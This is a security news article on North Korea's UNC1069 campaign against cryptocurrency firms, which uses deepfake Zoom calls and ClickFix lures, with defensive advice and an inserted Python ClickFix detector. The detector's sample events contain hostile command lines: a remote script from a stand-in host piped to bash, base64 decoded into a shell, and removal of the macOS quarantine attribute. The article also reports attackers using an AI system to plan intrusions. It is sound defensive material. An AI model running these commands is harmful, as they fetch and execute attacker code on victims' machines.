PROBABLYPWNED
Threat Intelligence | February 12, 2026 | 4 min read

North Korea Uses Deepfake Zoom Calls in Crypto Heists

Google Mandiant exposes UNC1069's use of AI-generated deepfake video, compromised executive accounts, and ClickFix attacks to deploy macOS malware against cryptocurrency firms.

Alex Kowalski

North Korean hackers are using AI-generated deepfake videos in Zoom calls to trick cryptocurrency executives into installing malware. Google's Mandiant team detailed the campaign in a report exposing UNC1069, a financially motivated threat group responsible for some of the most sophisticated social engineering attacks targeting the crypto sector.

The attacks combine compromised executive accounts, deepfake technology, and the ClickFix technique—where victims are tricked into "fixing" fake technical problems that actually install malware. It's a multi-stage operation that blends legitimate-looking business communications with cutting-edge deception.

The Attack Sequence

The Record documented a specific incident: attackers contacted a cryptocurrency executive via Telegram using the compromised account of another crypto industry figure. The victim received a Calendly link for a 30-minute meeting containing a Zoom URL—nothing obviously suspicious about a business meeting invitation.

During the call, the victim saw what appeared to be a CEO from another cryptocurrency company. The video was a deepfake. Technical "issues" during the call were deliberately staged, with the attackers asking the victim to follow troubleshooting steps that secretly triggered malware installation through the ClickFix technique.

ClickFix has been around for a while—we covered Lazarus Group using similar tactics in fake job interview scenarios. But combining it with real-time deepfake video during a Zoom call represents a significant escalation in sophistication.

Multi-Platform Malware Stack

Mandiant identified an extensive macOS malware arsenal deployed by UNC1069:

  • WAVESHAPER - Initial access component
  • HYPERCALL - Secondary loader
  • HIDDENCALL - Stealth communication module
  • DEEPBREATH - Persistence mechanism
  • CHROMEPUSH - Browser-based credential theft

The multi-stage approach lets attackers maintain access even if defenders identify and remove individual components. Each piece serves a specific function in the overall attack chain, from initial compromise through credential harvesting and persistent access.

AI-Powered Operations

Google's report revealed that UNC1069 uses Google's Gemini AI tool for operational research, tool development, and campaign planning. The group leverages AI across multiple phases of their operations—not just for generating deepfakes, but for gathering intelligence on targets, developing attack tools, and planning intrusions.

This aligns with broader trends in state-sponsored hacking. AI tools lower barriers to sophisticated attacks. Creating convincing deepfakes once required specialized expertise; now threat actors can generate them with accessible tools. The same applies to researching targets, crafting phishing lures, and developing malware.

$2 Billion in 2025 Alone

North Korean cryptocurrency theft isn't new, but the scale keeps growing. U.S. officials told the United Nations last month that dozens of countries dealt with crypto thefts perpetrated by North Korean hackers, with the regime accused of stealing more than $2 billion in cryptocurrency in 2025.

That money funds weapons programs and sanctions evasion. Unlike ransomware groups motivated by profit, North Korean hackers operate as an arm of state policy. They'll invest in sophisticated attacks—deepfake video production, multi-stage malware development, long-term account compromises—because the payoff scales with national priorities.

For deeper context on state-sponsored cyber operations, including how nations like North Korea integrate hacking into broader strategic objectives, see our recommended reading on cybersecurity history.

Protection for Crypto Industry Targets

Cryptocurrency executives and employees face elevated risk. Defensive measures should include:

Verify meeting invitations through separate channels: If someone you know requests a meeting, confirm via a different communication method—text, phone call, or verified email—before accepting.

Be suspicious of technical issues during calls: ClickFix attacks rely on victims following troubleshooting steps that execute malicious commands. If a meeting partner asks you to run terminal commands or paste text, that's a red flag.

Train staff to recognize deepfakes: While deepfake detection is imperfect, awareness that the technology exists helps. Audio or video that seems slightly off—unusual lip sync, strange lighting, robotic cadence—warrants additional verification.

Lock down cryptocurrency operations: Multi-signature wallets, hardware security keys, and transaction approval workflows add friction that prevents single-point-of-compromise losses.

Report suspicious contact: Industry information sharing helps defenders track evolving tactics. Report unusual outreach to relevant ISACs and security teams.
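To make the "be suspicious of technical issues during calls" advice concrete on the detection side, here is an added example (not code from the article, Mandiant, or UNC1069's tooling) that scores process-execution telemetry for the command shapes a ClickFix "troubleshooting step" typically asks a macOS user to paste, and separately flags shell commands whose parent is a video-call app. The line format, the process names in `VIDEO_CALL_PARENTS`, and every sample event are constructed for the example.

```python
import re
from dataclasses import dataclass

# Constructed sample telemetry (not real logs). One event per line:
# "<timestamp> <user> <parent_process> <command line>"
SAMPLE_EVENTS = [
    "2026-02-12T10:01:03Z alice Terminal ls -la ~/Documents",
    "2026-02-12T10:04:17Z alice Terminal curl -fsSL https://zoom-fix.invalid/audio.sh | bash",
    "2026-02-12T10:04:20Z alice bash echo aGVsbG8= | base64 --decode | sh",
    "2026-02-12T10:05:02Z alice zoom.us osascript -e 'do shell script \"echo ok\" with administrator privileges'",
    "2026-02-12T10:06:44Z alice Terminal xattr -d com.apple.quarantine /tmp/ZoomAudioFix",
    "2026-02-12T10:09:10Z alice Terminal git status",
]

# Command shapes a ClickFix lure typically asks the victim to paste into a terminal.
CLICKFIX_PATTERNS = [
    ("remote_script_piped_to_shell", re.compile(r"\bcurl\b.*\|\s*(ba|z)?sh\b")),
    ("base64_decoded_to_shell", re.compile(r"base64\s+(--decode|-d|-D)\b.*\|\s*(ba|z)?sh\b")),
    ("applescript_with_admin", re.compile(r"\bosascript\b.*administrator privileges")),
    ("quarantine_flag_removed", re.compile(r"\bxattr\b.*com\.apple\.quarantine")),
]

# Assumed parent process names (adjust to your telemetry) that should not be
# spawning shell commands in the middle of a meeting.
VIDEO_CALL_PARENTS = {"zoom.us", "MSTeams", "Webex"}

@dataclass
class Finding:
    timestamp: str
    user: str
    parent: str
    rule: str
    command: str

def detect_clickfix(lines):
    """Return one Finding per (event, rule) match; benign commands yield nothing."""
    findings = []
    for line in lines:
        ts, user, parent, command = line.split(" ", 3)
        rules = [name for name, pat in CLICKFIX_PATTERNS if pat.search(command)]
        if parent in VIDEO_CALL_PARENTS:
            rules.append("spawned_by_video_call_app")
        findings.extend(Finding(ts, user, parent, r, command) for r in rules)
    return findings

if __name__ == "__main__":
    for f in detect_clickfix(SAMPLE_EVENTS):
        print(f"{f.timestamp} {f.user} [{f.rule}] parent={f.parent}: {f.command}")
```

Treat a hit as a trigger for the out-of-band verification step above, not as proof of compromise: the same regexes also fire on legitimate developer workflows, so tune them against your own baseline.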

The Trend Line

North Korea's crypto theft operations grow more sophisticated each year. Deepfake technology democratizes impersonation attacks. ClickFix-style social engineering bypasses technical controls by exploiting human trust.

Cryptocurrency firms can't defend against this with technology alone. The attack surface is fundamentally human—people who receive meeting invitations, see familiar faces on video calls, and want to be helpful when technical problems arise. Our guide to detecting deepfakes provides practical techniques for identifying AI-generated video—training and awareness remain the front line.
